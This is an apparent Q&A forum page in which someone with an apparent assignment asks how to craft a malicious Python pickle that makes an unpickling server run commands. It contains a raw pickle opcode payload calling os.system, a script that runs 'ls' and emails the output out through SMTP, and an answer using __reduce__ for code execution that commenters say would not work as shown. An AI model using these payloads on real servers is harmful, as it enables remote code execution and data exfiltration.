Pickle Exploiting

Question

I have an assignment to send a pickle file to a server which unpickles anything sent to it. My plan is to have it email me back the ls command printed out. I have this file:

import smtplib
import commands
status, output = commands.getstatusoutput("ls")
server = smtplib.SMTP_SSL('smtp.gmail.com')
server.login("...@gmail.com", "password")
server.sendmail("...@gmail.com", "...@gmail.com", output)
server.quit()

How can I get the server to run this? I am trying to send a file like:

cos
system
(S''
tR.

with the python script in the ' '.

I was thinking something like:

cos
system
(S'python\n import smptlib\n ...'
tR.

but it doesn't execute the commands. How can I make it execute the python?

I've tried on my own computer and the python sends the email fine.

You say your assignment is to send a pickle file to a server. But your code has nothing to do with making a pickle file. If you want to send a pickle file (binary data) in an email it would be an attachment. I don't see anything about that either. Could you clarify this? What does the "ls" command have to do with it? — Paul Cornelius, Dec 07 '17 at 23:07
Yes, so I need to send a pickle file that will run a command. cos system (S'python\n import smptlib\n ...' tR. this is the pickle syntax to run a system command — Batman, Dec 07 '17 at 23:09
For example, cos system (S'sleep 100' tR. will sleep for 100 seconds — Batman, Dec 07 '17 at 23:10

timgeb · Answer 1 · 2022-03-31T09:30:09.303

12

Do whatever friendlyness you want to do in the __reduce__ method. Please don't be evil.

import pickle

class Friendly:
    def __reduce__(self):
        return (self.friendly, ('executing friendly code',))

    @staticmethod
    def friendly(x):
        print(x)

pickle.dump(Friendly(), open('pickled', 'wb'))
print('loading ...')
pickle.load(open('pickled', 'rb'))

->

$ python friendly.py
loading ...
executing friendly code

edited Mar 31 '22 at 09:30

answered Dec 07 '17 at 23:21

timgeb

76,762
20
123
145

6

It seems even more malicious when you have it claim to be friendly (: – HFBrowning Dec 07 '17 at 23:24
@HFBrowning fixed – timgeb Dec 07 '17 at 23:25
2

Hahah! It wasn't a criticism – HFBrowning Dec 07 '17 at 23:29
2

I don't understand how this will work. Won't this try and look for a `friendly` function on the server and, after most likely not finding one, raise `AttributeError`? And even if there happens to be a `friendly` function defined in the server's unpickling program, the `Friendly` object would call that one rather than the exploit's. – jacob Apr 06 '21 at 05:33
@jacob totally agree. I saw some other posts use this kind of examples. But it's really not persuasive. The unpickle side need to have the same python code for the unpickling process to be harmful. I found this https://checkoway.net/musings/pickle/ more suit the "Why unpickle from untrusted source is dangerous? " question. It's written in python2.7 but I guess it can also be done in python3. – Rick Jul 25 '22 at 10:49

Pickle Exploiting

1 Answers1